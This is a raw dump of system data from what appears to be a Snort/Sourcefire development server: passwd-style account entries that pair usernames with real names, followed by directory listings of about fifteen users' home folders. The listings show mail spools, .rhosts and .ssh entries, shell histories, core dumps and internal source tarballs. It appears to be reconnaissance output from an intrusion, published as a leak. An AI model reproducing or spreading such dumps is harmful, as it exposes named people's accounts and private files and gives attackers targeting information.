user:/home/sfuser1:/bin/sh jasonl:*:1010:1010:Jason Larsen:/home/jasonl:/usr/local/bin/tcsh cmg:*:1011:1011:Chris Green:/home/cmg:/usr/local/bin/tcsh sschwing:*:1012:1012:Steve Schwinger:/home/sschwing:/usr/local/bin/tcsh ls -al *; andrewb: total 1116 drwxr-xr-x 6 andrewb andrewb 512 --- -- ---- . drwxr-xr-x 15 root wheel 512 --- -- ---- .. drwx------ 3 andrewb andrewb 512 --- -- ---- .BitchX -rw-r--r-- 1 andrewb andrewb 769 --- -- ---- .cshrc -rw------- 1 andrewb andrewb 2807 --- -- ---- .history -rw-r--r-- 1 andrewb andrewb 318 --- -- ---- .login -rw-r--r-- 1 andrewb andrewb 105 --- -- ---- .mailrc -rw-r--r-- 1 andrewb andrewb 201 --- -- ---- .profile -rw------- 1 andrewb andrewb 128 --- -- ---- .rhosts drwx------ 2 andrewb andrewb 512 --- -- ---- .ssh -rw-r--r-- 1 andrewb andrewb 216 --- -- ---- .vimrc -rw-r--r-- 1 andrewb andrewb 134007 --- -- ---- barnyard-0.1.0-beta3.tar.gz -rw-r--r-- 1 andrewb andrewb 156397 --- -- ---- barnyard-0.1.0-beta4.tar.gz -rw-r--r-- 1 andrewb andrewb 147971 --- -- ---- barnyard-sf.tgz -rw-r--r-- 1 andrewb andrewb 64551 --- -- ---- parser.tgz -rw-r--r-- 1 andrewb andrewb 6630 --- -- ---- solaris.diff drwxr-xr-x 3 andrewb andrewb 512 --- -- ---- src drwxr-xr-x 2 andrewb andrewb 512 --- -- ---- src.old bmc: total 1143996 -rw-r--r-- 1 bmc bmc 5102865 --- -- ---- (X-Ecutioners) It's Going Down.mp3 drwxr-xr-x 18 bmc bmc 3072 --- -- ---- . drwxr-xr-x 15 root wheel 512 --- -- ---- .. drwx------ 3 bmc bmc 512 --- -- ---- .BitchX -rw-r--r-- 1 bmc bmc 88 --- -- ---- .bitchxc -rw-r--r-- 1 bmc bmc 126 --- -- ---- .bitchxrc -rw-r--r-- 1 bmc bmc 769 --- -- ---- .cshrc -rw-r--r-- 1 bmc bmc 126 --- -- ---- .epic4rc -rw-r--r-- 1 bmc bmc 126 --- -- ---- .epicrc -rw------- 1 bmc bmc 2180 --- -- ---- .history -rw------- 1 bmc bmc 40 --- -- ---- .ircrc -rw-r--r-- 1 bmc bmc 318 --- -- ---- .login -rw------- 1 bmc bmc 104 --- -- ---- .lynx_cookies -rw-r--r-- 1 bmc bmc 105 --- -- ---- .mailrc -rw-r--r-- 1 bmc bmc 123 --- -- ---- .muttrc -rw-r--r-- 1 bmc bmc 201 --- -- ---- .profile -rw------- 1 bmc bmc 128 --- -- ---- .rhosts -rw-r--r-- 1 bmc bmc 84 --- -- ---- .screenrc drwx------ 2 bmc bmc 512 --- -- ---- .ssh -rw-r--r-- 1 bmc bmc 1009016 --- -- ---- 06-02-2002.tgz -rw------- 1 bmc bmc 8862 --- -- ---- 100Mb_tapping1.pdf -rw------- 1 bmc bmc 9117 --- -- ---- 100Mb_tapping2.pdf -rw-r--r-- 1 bmc bmc 1617800 --- -- ---- 2002-06-24-b.zip -rw-r--r-- 1 bmc bmc 888503 --- -- ---- 2002-06-24.zip -rw-r--r-- 1 bmc bmc 90063 --- -- ---- 7350php.tgz -rw------- 1 bmc bmc 1667444 --- -- ---- BitchX-1.0c17.core -rw-r--r-- 1 bmc bmc 287866 --- -- ---- IDSk9-sig-3.0-3-S15.bin -rw-r--r-- 1 bmc bmc 7603 --- -- ---- IDSk9-sig-3.0-3-S15.readme drwx------ 2 bmc bmc 512 --- -- ---- Mail -rw-r--r-- 1 bmc bmc 245808 --- -- ---- NetRecon-CVE-200.xls drwxr-xr-x 4 bmc bmc 512 --- -- ---- SENSIG30 -rw-r--r-- 1 bmc bmc 207539 --- -- ---- SENSIG30.tar.Z drwxr-xr-x 2 bmc bmc 512 --- -- ---- WWW drwxr-xr-x 4 bmc bmc 512 --- -- ---- advice.networkice.com -rw-r--r-- 1 bmc bmc 2452743 --- -- ---- arin.20020501 -rw-r--r-- 1 bmc bmc 985426 --- -- ---- autox.tgz -rw------- 1 bmc bmc 2741 --- -- ---- barnyard.server.gz drwxr-xr-x 2 bmc bmc 512 --- -- ---- bin -rw-r--r-- 1 bmc bmc 285975 --- -- ---- blah.bin -rw-r--r-- 1 bmc bmc 9277 --- -- ---- byebye-small.jpg -rw-r--r-- 1 bmc bmc 858 --- -- ---- crashme.cap -rw-r--r-- 1 bmc bmc 121431654 --- -- ---- csv14full.exe drwxr-xr-x 2 bmc bmc 512 --- -- ---- cvsroot -rwxr-xr-x 1 bmc bmc 846 --- -- ---- dhcpclient drwxr-xr-x 2 bmc bmc 512 --- -- ---- docs drwxr-xr-x 5 bmc bmc 6144 --- -- ---- ethereal-0.9.3 -rw-r--r-- 1 bmc bmc 2961451 --- -- ---- ethereal-0.9.3.tar.gz drwxr-xr-x 4 bmc bmc 512 --- -- ---- exploits -rw-r--r-- 1 bmc bmc 12385 --- -- ---- face-sm.jpg -rw-r--r-- 1 bmc bmc 11452 --- -- ---- face_2-sm.jpg drwxr-xr-x 2 bmc bmc 512 --- -- ---- gzsig-0.1 -rw-r--r-- 1 bmc bmc 35494 --- -- ---- gzsig-0.1.tar.gz -rw-r--r-- 1 bmc bmc 10670 --- -- ---- head.jpg -rw-r--r-- 1 bmc bmc 80921107 --- -- ---- hl1109.exe -rwxr-xr-x 1 bmc bmc 1967 --- -- ---- honeysuckle -rw-r--r-- 1 bmc bmc 2891 --- -- ---- inout-1.0-tar.gz -rw-r--r-- 1 bmc bmc 1000 --- -- ---- ip360 -rw-r--r-- 1 bmc bmc 846336 --- -- ---- iss HigkRiskCVEs.xls -rw-r--r-- 1 bmc bmc 682927 --- -- ---- iss.csv -rw-r--r-- 1 bmc bmc 3925 --- -- ---- logo.gif -rw------- 1 bmc bmc 735 --- -- ---- mbox -rw------- 1 bmc bmc 628680 --- -- ---- mbox.gz -rw------- 1 bmc bmc 1169120 --- -- ---- mbox2.gz -rw-r--r-- 1 bmc bmc 18385 --- -- ---- miche-small.jpg drwxr-xr-x 3 bmc bmc 1536 --- -- ---- mp3 -rw-r--r-- 1 bmc bmc 316092 --- -- ---- msr.tar.gz -r-xr-xr-x 1 bmc bmc 442368 --- -- ---- mutt drwxr-xr-x 2 bmc bmc 512 --- -- ---- packets -rw-r--r-- 1 bmc bmc 33263 --- -- ---- polo.jpg -rw------- 1 bmc bmc 540 --- -- ---- postponed -rw-r--r-- 1 bmc bmc 9946 --- -- ---- profile.JPG -rw-r--r-- 1 bmc bmc 13629 --- -- ---- profile_2-sm.jpg -rw-r--r-- 1 bmc bmc 56230 --- -- ---- quals.csv -rw-r--r-- 1 bmc bmc 55237030 --- -- ---- referer -rw-r--r-- 1 bmc bmc 18329 --- -- ---- renfest-small.jpg -rw-r--r-- 1 bmc bmc 1298 --- -- ---- segfault_ca.pem -rw------- 1 bmc bmc 114176 --- -- ---- sev_export_cve.xls -rwxr-xr-x 1 bmc bmc 2861 --- -- ---- sforce_ai -rw-r--r-- 1 bmc bmc 9033 --- -- ---- silc-client-0.8.6.diff -rw------- 1 bmc bmc 2000297 --- -- ---- silidef -rw-r--r-- 1 bmc bmc 1960 --- -- ---- smo.ksh -rw-r--r-- 1 bmc bmc 40960 --- -- ---- sneeze-1.0.tar drwxr-xr-x 3 bmc bmc 512 --- -- ---- snort -rw-r--r-- 1 bmc bmc 199418 --- -- ---- snort-1.8.5-openbsd-3.0.pkg.tgz -rw-r--r-- 1 bmc bmc 720692 --- -- ---- snort-1.8.5-solaris-2.8.pkg.gz -rw-r--r-- 1 bmc bmc 10370832 --- -- ---- snort-cvsroot.tar.gz -rw-r--r-- 1 bmc bmc 10380309 --- -- ---- snort-cvsroot.tar.gz.1 -rw-r--r-- 1 bmc bmc 11875917 --- -- ---- snort-cvsroot.tar.gz.10 -rw-r--r-- 1 bmc bmc 11929136 --- -- ---- snort-cvsroot.tar.gz.11 -rw-r--r-- 1 bmc bmc 12069901 --- -- ---- snort-cvsroot.tar.gz.12 -rw-r--r-- 1 bmc bmc 12109819 --- -- ---- snort-cvsroot.tar.gz.13 -rw-r--r-- 1 bmc bmc 12293670 --- -- ---- snort-cvsroot.tar.gz.14 -rw-r--r-- 1 bmc bmc 12308852 --- -- ---- snort-cvsroot.tar.gz.15 -rw-r--r-- 1 bmc bmc 12361860 --- -- ---- snort-cvsroot.tar.gz.16 -rw-r--r-- 1 bmc bmc 12465104 --- -- ---- snort-cvsroot.tar.gz.17 -rw-r--r-- 1 bmc bmc 12471095 --- -- ---- snort-cvsroot.tar.gz.18 -rw-r--r-- 1 bmc bmc 12481160 --- -- ---- snort-cvsroot.tar.gz.19 -rw-r--r-- 1 bmc bmc 10433614 --- -- ---- snort-cvsroot.tar.gz.2 -rw-r--r-- 1 bmc bmc 12569554 --- -- ---- snort-cvsroot.tar.gz.20 -rw-r--r-- 1 bmc bmc 10508638 --- -- ---- snort-cvsroot.tar.gz.3 -rw-r--r-- 1 bmc bmc 10896512 --- -- ---- snort-cvsroot.tar.gz.4 -rw-r--r-- 1 bmc bmc 11313018 --- -- ---- snort-cvsroot.tar.gz.5 -rw-r--r-- 1 bmc bmc 11353208 --- -- ---- snort-cvsroot.tar.gz.6 -rw-r--r-- 1 bmc bmc 11397599 --- -- ---- snort-cvsroot.tar.gz.7 -rw-r--r-- 1 bmc bmc 11620457 --- -- ---- snort-cvsroot.tar.gz.8 -rw-r--r-- 1 bmc bmc 11829229 --- -- ---- snort-cvsroot.tar.gz.9 -rw------- 1 bmc bmc 2846 --- -- ---- snort.server.gz -rw------- 1 bmc bmc 1442726 --- -- ---- snort_log -rwxr-xr-x 1 bmc bmc 334287 --- -- ---- stunnel -rw-r--r-- 1 bmc bmc 919 --- -- ---- submit -rw------- 1 bmc bmc 2073290 --- -- ---- teso -rw-r--r-- 1 bmc bmc 10197 --- -- ---- thumb1-sm.jpg -rw-r--r-- 1 bmc bmc 53106716 --- -- ---- uniq -rw-r--r-- 1 bmc bmc 614 --- -- ---- urls -rw-r--r-- 1 bmc bmc 9690 --- -- ---- wireless-scanner.png drwxr-x--- 4 bmc bmc 512 --- -- ---- x2src -rw-r--r-- 1 bmc bmc 27369 --- -- ---- x2src.tgz cmg: total 47754 drwxr-xr-x 15 cmg cmg 1024 --- -- ---- . drwxr-xr-x 15 root wheel 512 --- -- ---- .. -rw-r--r-- 1 cmg cmg 843 --- -- ---- .cshrc -rw------- 1 cmg cmg 2538 --- -- ---- .history drwxr-xr-x 9 cmg cmg 1024 --- -- ---- .irc -rw-r--r-- 1 cmg cmg 247 --- -- ---- .ircrc -rw-r--r-- 1 cmg cmg 71 --- -- ---- .lice_updates.txt -rw-r--r-- 1 cmg cmg 318 --- -- ---- .login -rw-r--r-- 1 cmg cmg 105 --- -- ---- .mailrc -rw-r--r-- 1 cmg cmg 201 --- -- ---- .profile -rw------- 1 cmg cmg 128 --- -- ---- .rhosts -rw-r--r-- 1 cmg cmg 3396 --- -- ---- .screenrc drwx------ 2 cmg cmg 512 --- -- ---- .ssh -rw-r--r-- 1 cmg cmg 1408922 --- -- ---- 42.zip -rw------- 1 cmg cmg 318008 --- -- ---- IRCLOG.#antisnort -rw------- 1 cmg cmg 28173 --- -- ---- IRCLOG.#snortschemas -rw-r--r-- 1 cmg cmg 12360 --- -- ---- MAKEDEV -rw-r--r-- 1 cmg cmg 1594880 --- -- ---- Snort185Win32.exe -rw-r--r-- 1 cmg cmg 30370 --- -- ---- bdb-eval.tar.gz drwxr-xr-x 2 cmg cmg 512 --- -- ---- bin drwxr-xr-x 7 cmg cmg 512 --- -- ---- build drwxr-xr-x 2 cmg cmg 512 --- -- ---- cdrom -rw-r--r-- 1 cmg cmg 14426372 --- -- ---- cvsroot.tar.gz drwxr-xr-x 2 cmg cmg 512 --- -- ---- downloads -rw-r--r-- 1 cmg cmg 662234 --- -- ---- epic.tar.gz drwxr-xr-x 9 cmg cmg 1024 --- -- ---- epic4-1.1.5 -rw-r--r-- 1 cmg cmg 614 --- -- ---- id_dsa.pub -rw-r--r-- 1 cmg cmg 206962 --- -- ---- irc.tar.gz -rw-r--r-- 1 cmg cmg 208906 --- -- ---- irc.tgz -rw-r--r-- 1 cmg cmg 6040 --- -- ---- named.tgz -rw-r--r-- 1 cmg cmg 12017 --- -- ---- pm.rc -rw-r--r-- 1 cmg cmg 1726082 --- -- ---- snort-1.8.7.tar.gz drwxr-xr-x 9 cmg cmg 1024 --- -- ---- snort-1.9 -r--r--r-- 1 cmg cmg 1794602 --- -- ---- snort-20020129-1stable.src.rpm drwxr-xr-x 2 cmg cmg 512 --- -- ---- snort-rpms drwxr-xr-x 7 cmg cmg 7680 --- -- ---- snort-stable -rw-r--r-- 1 cmg cmg 1807323 --- -- ---- snort-stable-snapshot.tar.gz -rw-r--r-- 1 cmg cmg 47825 --- -- ---- snot-0.92a.tar.gz drwxr-xr-x 5 cmg cmg 512 --- -- ---- src drwxr-xr-x 2 cmg cmg 512 --- -- ---- tmp drwxr-xr-x 2 cmg cmg 1024 --- -- ---- tocerb dr: total 417076 drwxr-xr-x 6 dr dr 3072 --- -- ---- . drwxr-xr-x 15 root wheel 512 --- -- ---- .. -rw-r--r-- 1 dr dr 769 --- -- ---- .cshrc -rw------- 1 dr dr 1829 --- -- ---- .history -rw-r--r-- 1 dr dr 318 --- -- ---- .login -rw-r--r-- 1 dr dr 105 --- -- ---- .mailrc -rw-r--r-- 1 dr dr 201 --- -- ---- .profile -rw------- 1 dr dr 128 --- -- ---- .rhosts drwx------ 2 dr dr 512 --- -- ---- .ssh -rw-r--r-- 1 dr dr 1022 --- -- ---- 10.1.1.35 -rw-r--r-- 1 dr dr 216 --- -- ---- Alerts.php -rw-r--r-- 1 dr dr 8276 --- -- ---- AlertsData.php -rw-r--r-- 1 dr dr 801 --- -- ---- AlertsGraphs.php -rw-r--r-- 1 dr dr 7784 --- -- ---- AlertsIncident.php -rw-r--r-- 1 dr dr 7893 --- -- ---- AlertsQuery.php -rw-r--r-- 1 dr dr 7633 --- -- ---- AlertsRecent.php -rw-r--r-- 1 dr dr 5316 --- -- ---- AlertsReports.php -rw-r--r-- 1 dr dr 6996 --- -- ---- AlertsStats.php -rw-r--r-- 1 dr dr 2052 --- -- ---- Browse-or.jpg -rw-r--r-- 1 dr dr 2100 --- -- ---- Browse-y.jpg -rw-r--r-- 1 dr dr 2070 --- -- ---- Browse-yp.jpg -rw-r--r-- 1 dr dr 224 --- -- ---- Config.php -rw-r--r-- 1 dr dr 20731 --- -- ---- ConfigNet.php -rw-r--r-- 1 dr dr 13932 --- -- ---- ConfigSnort.php -rw-r--r-- 1 dr dr 8482 --- -- ---- ConfigUsers.php -rw-r--r-- 1 dr dr 229 --- -- ---- Help.php -rw-r--r-- 1 dr dr 1470 --- -- ---- Login.php -rw-r--r-- 1 dr dr 250 --- -- ---- Logout.php -rw-r--r-- 1 dr dr 2102 --- -- ---- Reports-or.jpg -rw-r--r-- 1 dr dr 2179 --- -- ---- Reports-y.jpg -rw-r--r-- 1 dr dr 2328 --- -- ---- Reports-yp.jpg -rw-r--r-- 1 dr dr 18510 --- -- ---- Rules.php -rw-r--r-- 1 dr dr 10088 --- -- ---- RulesActive.php -rw-r--r-- 1 dr dr 33149 --- -- ---- RulesBrowse.php -rw-r--r-- 1 dr dr 30918 --- -- ---- RulesEdit.php -rw-r--r-- 1 dr dr 11513 --- -- ---- RulesFiles.php -rw-r--r-- 1 dr dr 2165 --- -- ---- RulesImport.php -rw-r--r-- 1 dr dr 9882 --- -- ---- RulesInactive.php -rw-r--r-- 1 dr dr 31789 --- -- ---- RulesNew.php -rw-r--r-- 1 dr dr 22506 --- -- ---- RulesSearch.php -rw-r--r-- 1 dr dr 23103 --- -- ---- RulesType.php -rw-r--r-- 1 dr dr 7594 --- -- ---- RulesVars.php -rw-r--r-- 1 dr dr 209 --- -- ---- Sensor.php -rw-r--r-- 1 dr dr 2721 --- -- ---- SensorDisk.php -rw-r--r-- 1 dr dr 1821 --- -- ---- SensorProcess.php -rw-r--r-- 1 dr dr 804 --- -- ---- SensorSnort.php -rw-r--r-- 1 dr dr 1022 --- -- ---- SensorSyslog.php -rw-r--r-- 1 dr dr 1607168 --- -- ---- Snort Win32.exe -rw-r--r-- 1 dr dr 1570304 --- -- ---- Snort Win32.msi -rw-r--r-- 1 dr dr 1298944 --- -- ---- Snort-182.exe -rw-r--r-- 1 dr dr 1526784 --- -- ---- Snort183Win32.exe -rw-r--r-- 1 dr dr 1298944 --- -- ---- SnortWin32-183.exe -rw-r--r-- 1 dr dr 1644032 --- -- ---- SnortWin32-183F.exe -rw-r--r-- 1 dr dr 63856017 --- -- ---- base29.tgz -rw-r--r-- 1 dr dr 73947166 --- -- ---- base29.tgz_10_2_01 -rw-r--r-- 1 dr dr 56005424 --- -- ---- base29.tgz_7_25_01 -rw-r--r-- 1 dr dr 2262062 --- -- ---- bsd -rwxr-xr-x 1 dr dr 332 --- -- ---- buildfxp0 -rwxr-xr-x 1 dr dr 332 --- -- ---- buildfxp0.sh -rwxr-xr-x 1 dr dr 332 --- -- ---- buildfxp1 -rwxr-xr-x 1 dr dr 332 --- -- ---- buildfxp1.sh drwxr-xr-x 2 dr dr 5120 --- -- ---- buttons -rw-r--r-- 1 dr dr 61476 --- -- ---- buttons.tgz -rw-r--r-- 1 dr dr 10435 --- -- ---- data_analysis.php -rw-r--r-- 1 dr dr 3879 --- -- ---- day_graph.php -rw-r--r-- 1 dr dr 9297 --- -- ---- dst_port_summary.php -rw-r--r-- 1 dr dr 8654 --- -- ---- event_display.php -rw-r--r-- 1 dr dr 7623 --- -- ---- events.php -rw-r--r-- 1 dr dr 7982 --- -- ---- events_actionpage.php -rw-r--r-- 1 dr dr 337 --- -- ---- fill.html -rw-r--r-- 1 dr dr 337 --- -- ---- fxp0stat.php -rw-r--r-- 1 dr dr 3869 --- -- ---- hr_graph.php -rw-r--r-- 1 dr dr 4080 --- -- ---- incident_name_page.php -rw-r--r-- 1 dr dr 6630 --- -- ---- incident_page.php -rw-r--r-- 1 dr dr 3928 --- -- ---- ip_graph.php -rw-r--r-- 1 dr dr 204529 --- -- ---- j.tgz -rw-r--r-- 1 root dr 133029 --- -- ---- libprelude-latest.tar.gz -rw-r--r-- 1 dr dr 1457 --- -- ---- mfoot.php -rw-r--r-- 1 dr dr 5281 --- -- ---- mfrm.php -rw-r--r-- 1 dr dr 6034 --- -- ---- mhead.php -rw-r--r-- 1 dr dr 74936 --- -- ---- nbut.tgz -rw-r--r-- 1 dr dr 9035 --- -- ---- packet_display.php -rw-r--r-- 1 dr dr 3920 --- -- ---- port_graph.php -rw-r--r-- 1 root dr 424844 --- -- ---- prelude-nids-latest.tar.gz -rw-r--r-- 1 dr dr 6254 --- -- ---- query_page.php -rw-r--r-- 1 dr dr 30395 --- -- ---- redit.php drwxr-xr-x 2 dr dr 1024 --- -- ---- rules -rwxr-xr-x 1 dr dr 167 --- -- ---- rulesdiff -rwxr-xr-x 1 dr dr 165 --- -- ---- rulesupdate -rw-r--r-- 1 dr dr 881 --- -- ---- save_report.php -rw-r--r-- 1 dr dr 8230 --- -- ---- search.php drwxrwxrwx 4 dr dr 512 --- -- ---- sf_final -rw-r--r-- 1 dr dr 391292 --- -- ---- sf_final.tgz -rw-r--r-- 1 dr dr 6326083 --- -- ---- sfht.tgz -rw-r--r-- 1 dr dr 5563 --- -- ---- sfire.jpg -rw-r--r-- 1 dr dr 6538 --- -- ---- sflogo.jpg -rw-r--r-- 1 dr dr 12623 --- -- ---- sfpost.tgz -rw-r--r-- 1 dr dr 4772 --- -- ---- show_incident_report.php -rw-r--r-- 1 dr dr 5051 --- -- ---- show_query_report.php -rwxr-xr-x 1 dr dr 18746 --- -- ---- snorthup -rw-r--r-- 1 dr dr 1514 --- -- ---- snortstat.php -rw-r--r-- 1 dr dr 9283 --- -- ---- src_ip_summary.php -rw-r--r-- 1 dr dr 7504 --- -- ---- stats_actionpage.php -rw-r--r-- 1 dr dr 648 --- -- ---- style.php -rw-r--r-- 1 dr dr 1566 --- -- ---- syslog.php -rw-r--r-- 1 dr dr 3567 --- -- ---- time.php -rw-r--r-- 1 dr dr 1769 --- -- ---- top.php -rw-r--r-- 1 dr dr 33 --- -- ---- user.f -rw-r--r-- 1 dr dr 529 --- -- ---- webinterface.php -rw-r--r-- 1 dr dr 702 --- -- ---- yframe14mod.jpg -rw-r--r-- 1 dr dr 587 --- -- ---- yframe8mod.jpg -rw-r--r-- 1 dr dr 3218 --- -- ---- yfrm.php -rw-r--r-- 1 dr dr 21548 --- -- ---- yfrm.tgz jasonl: total 14470 drwxr-xr-x 3 jasonl jasonl 512 --- -- ---- . drwxr-xr-x 15 root wheel 512 --- -- ---- .. -rw-r--r-- 1 jasonl jasonl 769 --- -- ---- .cshrc -rw------- 1 jasonl jasonl 1061 --- -- ---- .history -rw-r--r-- 1 jasonl jasonl 318 --- -- ---- .login -rw-r--r-- 1 jasonl jasonl 105 --- -- ---- .mailrc -rw-r--r-- 1 jasonl jasonl 201 --- -- ---- .profile -rw------- 1 jasonl jasonl 128 --- -- ---- .rhosts drwx------ 2 jasonl jasonl 512 --- -- ---- .ssh -rw-r--r-- 1 jasonl jasonl 7503 --- -- ---- cannon.c -rw-r--r-- 1 jasonl jasonl 205 --- -- ---- cannon.h -rw-r--r-- 1 jasonl jasonl 5846298 --- -- ---- jason.tmp.tar -r--r--r-- 1 jasonl jasonl 326290 --- -- ---- mcrypt-2.5.10.tar.gz -rw-r--r-- 1 jasonl jasonl 18777 --- -- ---- mstring.c -rw-r--r-- 1 jasonl jasonl 1486 --- -- ---- mstring.h -rw-r--r-- 1 jasonl jasonl 204849 --- -- ---- mysql.tgz -rw-r--r-- 1 jasonl jasonl 799182 --- -- ---- mysql_db_setup -rw-r--r-- 1 jasonl jasonl 258 --- -- ---- mysql_system_setup -rw-r--r-- 1 jasonl jasonl 99603 --- -- ---- nitro.c -rw-r--r-- 1 jasonl jasonl 10457 --- -- ---- php_nitro.h -rwxr-xr-x 1 jasonl jasonl 14590 --- -- ---- sfserver jed: total 58450 drwxr-xr-x 5 jed jed 1024 --- -- ---- . drwxr-xr-x 15 root wheel 512 --- -- ---- .. -rw-r--r-- 1 jed jed 769 --- -- ---- .cshrc -rw------- 1 jed jed 2324 --- -- ---- .history -rw-r--r-- 1 jed jed 318 --- -- ---- .login -rw-r--r-- 1 jed jed 105 --- -- ---- .mailrc -rw-r--r-- 1 jed jed 201 --- -- ---- .profile -rw------- 1 jed jed 128 --- -- ---- .rhosts drwx------ 2 jed jed 512 --- -- ---- .ssh drwxr-xr-x 2 jed jed 512 --- -- ---- DB dr-xr-xr-x 2 jed jed 512 --- -- ---- Java -rw-r--r-- 1 jed jed 55581 --- -- ---- NitroDB.h -rw-r--r-- 1 jed jed 51200 --- -- ---- PacketLibrary.tar -rw-r--r-- 1 jed jed 716800 --- -- ---- barnyard-sf.tar -rw-r--r-- 1 jed jed 983040 --- -- ---- barnyard.tar -rw-r--r-- 1 jed jed 161450 --- -- ---- barnyard.tar.gz -rw-r--r-- 1 jed jed 245760 --- -- ---- bug.tar -rwxr-xr-x 1 jed jed 11743 --- -- ---- hello -rwxr-xr-x 1 jed jed 1457796 --- -- ---- httpd -rw-r--r-- 1 jed jed 33802 --- -- ---- httpd.conf -rwxr--r-- 1 jed jed 1248812 --- -- ---- libNitroDB-glibc2.1.so.2.0.0 -r--r--r-- 1 jed jed 868364 --- -- ---- libNitroDB-glibc2.2.so.2.0.0 -rwxr-xr-x 1 jed jed 1247196 --- -- ---- libNitroDB.so -rwxr--r-- 1 jed jed 719172 --- -- ---- libNitroSock-glibc2.1.so.2.0.0 -r--r--r-- 1 jed jed 756776 --- -- ---- libNitroSock-glibc2.2.so.2.0.0 -rw-r--r-- 1 jed jed 756808 --- -- ---- libNitroSock.so -rwxr-xr-x 1 jed jed 2818615 --- -- ---- php -rw-r--r-- 1 jed jed 51200 --- -- ---- sf.tar -rwxr-xr-x 1 jed jed 18533 --- -- ---- sfRebuild -rw-r--r-- 1 jed jed 20480 --- -- ---- sfRebuild.tar -rwxr--r-- 1 jed jed 4137 --- -- ---- sfdb.dfl -rwxr-xr-x 1 jed jed 13366 --- -- ---- sfserver -rwxr-xr-x 1 jed jed 14590 --- -- ---- sfserver.old -rw-r--r-- 1 jed jed 51200 --- -- ---- sfserver.tar -rw-r--r-- 1 jed jed 1706939 --- -- ---- snort-1.8.3.tar.gz -rw------- 1 jed jed 203065 --- -- ---- snort-unified.log.1011651374 -rwxr-xr-x 1 jed jed 11762 --- -- ---- snort.dfl -rwxr-xr-x 1 jed jed 23168 --- -- ---- snort.src -rwxr-xr-x 1 jed jed 59578 --- -- ---- unifiedClient -rwxr-xr-x 1 jed jed 75223 --- -- ---- unifiedServer -rw------- 1 jed jed 14811859 --- -- ---- unifiedServer.core.gz -rw-r--r-- 1 jed jed 512000 --- -- ---- unifiedServer.tar jpavlick: total 50 drwxr-xr-x 3 jpavlick jpavlick 512 --- -- ---- . drwxr-xr-x 15 root wheel 512 --- -- ---- .. -rw-r--r-- 1 jpavlick jpavlick 769 --- -- ---- .cshrc -rw------- 1 jpavlick jpavlick 2572 --- -- ---- .history -rw-r--r-- 1 jpavlick jpavlick 318 --- -- ---- .login -rw-r--r-- 1 jpavlick jpavlick 105 --- -- ---- .mailrc -rw-r--r-- 1 jpavlick jpavlick 201 --- -- ---- .profile -rw------- 1 jpavlick jpavlick 128 --- -- ---- .rhosts drwx------ 2 jpavlick jpavlick 512 --- -- ---- .ssh -rw-r--r-- 1 jpavlick jpavlick 13735 --- -- ---- index.htm -rw-r--r-- 1 root jpavlick 0 --- -- ---- me mikef: total 14 drwxr-xr-x 2 mikef mikef 512 --- -- ---- . drwxr-xr-x 15 root wheel 512 --- -- ---- .. -rw-r--r-- 1 mikef mikef 769 --- -- ---- .cshrc -rw-r--r-- 1 mikef mikef 318 --- -- ---- .login -rw-r--r-- 1 mikef mikef 105 --- -- ---- .mailrc -rw-r--r-- 1 mikef mikef 201 --- -- ---- .profile -rw------- 1 mikef mikef 128 --- -- ---- .rhosts phil: total 14 drwxr-xr-x 2 phil phil 512 --- -- ---- . drwxr-xr-x 15 root wheel 512 --- -- ---- .. -rw-r--r-- 1 phil phil 621 --- -- ---- .cshrc -rw-r--r-- 1 phil phil 318 --- -- ---- .login -rw-r--r-- 1 phil phil 105 --- -- ---- .mailrc -rw-r--r-- 1 phil phil 201 --- -- ---- .profile -rw------- 1 phil phil 128 --- -- ---- .rhosts roesch: total 393860 drwxr-xr-x 8 roesch roesch 1024 --- -- ---- . drwxr-xr-x 15 root wheel 512 --- -- ---- .. drwx------ 3 roesch roesch 512 --- -- ---- .BitchX -rw-r--r-- 1 roesch roesch 621 --- -- ---- .cshrc -rw------- 1 roesch roesch 2452 --- -- ---- .history -rw-r--r-- 1 roesch roesch 318 --- -- ---- .login -rw-r--r-- 1 roesch roesch 105 --- -- ---- .mailrc -rw-r--r-- 1 roesch roesch 201 --- -- ---- .profile -rw------- 1 roesch roesch 128 --- -- ---- .rhosts drwx------ 2 roesch roesch 512 --- -- ---- .ssh drwxr-xr-x 6 roesch roesch 512 --- -- ---- 3.1 -rw-r--r-- 1 roesch roesch 49 --- -- ---- README -rw-r--r-- 1 roesch roesch 84470 --- -- ---- TR94-17.ps -r-xr-xr-x 1 dr dr 89395561 --- -- ---- csv11full.exe -rw-r--r-- 1 roesch roesch 19056 --- -- ---- gpgstuff.tgz -r-xr-xr-x 1 dr dr 69335386 --- -- ---- hl1107.exe -rw-r----- 1 roesch roesch 30892631 --- -- ---- honeynet.tar.gz -rw-r--r-- 1 roesch roesch 13441 --- -- ---- index.htm -rw-r--r-- 1 roesch roesch 806 --- -- ---- index.html -rw-r--r-- 1 roesch roesch 133029 --- -- ---- libprelude-latest.tar.gz -rw-r--r-- 1 roesch roesch 1179507 --- -- ---- new_pdf_files.zip -rw-r--r-- 1 roesch roesch 10885 --- -- ---- news_update 3_1_02.zip drwxr-xr-x 7 roesch roesch 2048 --- -- ---- nmap-2.54BETA34 -rw-r--r-- 1 roesch roesch 861995 --- -- ---- nmap-2.54BETA34.tgz -rw-r--r-- 1 roesch roesch 398595 --- -- ---- openssh-3.4.tgz -rw-r--r-- 1 roesch roesch 605 --- -- ---- out -rw-r--r-- 1 roesch roesch 3119 --- -- ---- pr3.htm -rw-r--r-- 1 roesch roesch 424844 --- -- ---- prelude-nids-latest.tar.gz -rw-r--r-- 1 roesch roesch 3837 --- -- ---- revised_console_index.ZIP -rw-r--r-- 1 roesch roesch 5844 --- -- ---- revised_screens.zip -rw-r--r-- 1 roesch roesch 3036128 --- -- ---- sf_website.zip -rw-r--r-- 1 roesch roesch 5681 --- -- ---- sflogo2.gif drwxr-xr-x 11 roesch roesch 1024 --- -- ---- snort -rw-r--r-- 1 roesch roesch 1714632 --- -- ---- snort-1.8.4-beta4.tar.gz -rw-r--r-- 1 roesch roesch 1731645 --- -- ---- snort-1.8.4-beta5.tar.gz -rw-r--r-- 1 roesch roesch 1766532 --- -- ---- snort-1.8.4.tar.gz -rw-r--r-- 1 roesch roesch 350535 --- -- ---- snort-1.8.4.tgz drwxr-xr-x 15 roesch roesch 4096 --- -- ---- ssh sfuser1: total 26 drwxr-xr-x 3 sfuser1 sfuser1 1536 --- -- ---- . drwxr-xr-x 15 root wheel 512 --- -- ---- .. -rw-r--r-- 1 sfuser1 sfuser1 769 --- -- ---- .cshrc -rw-r--r-- 1 sfuser1 sfuser1 318 --- -- ---- .login -rw-r--r-- 1 sfuser1 sfuser1 105 --- -- ---- .mailrc -rw-r--r-- 1 sfuser1 sfuser1 201 --- -- 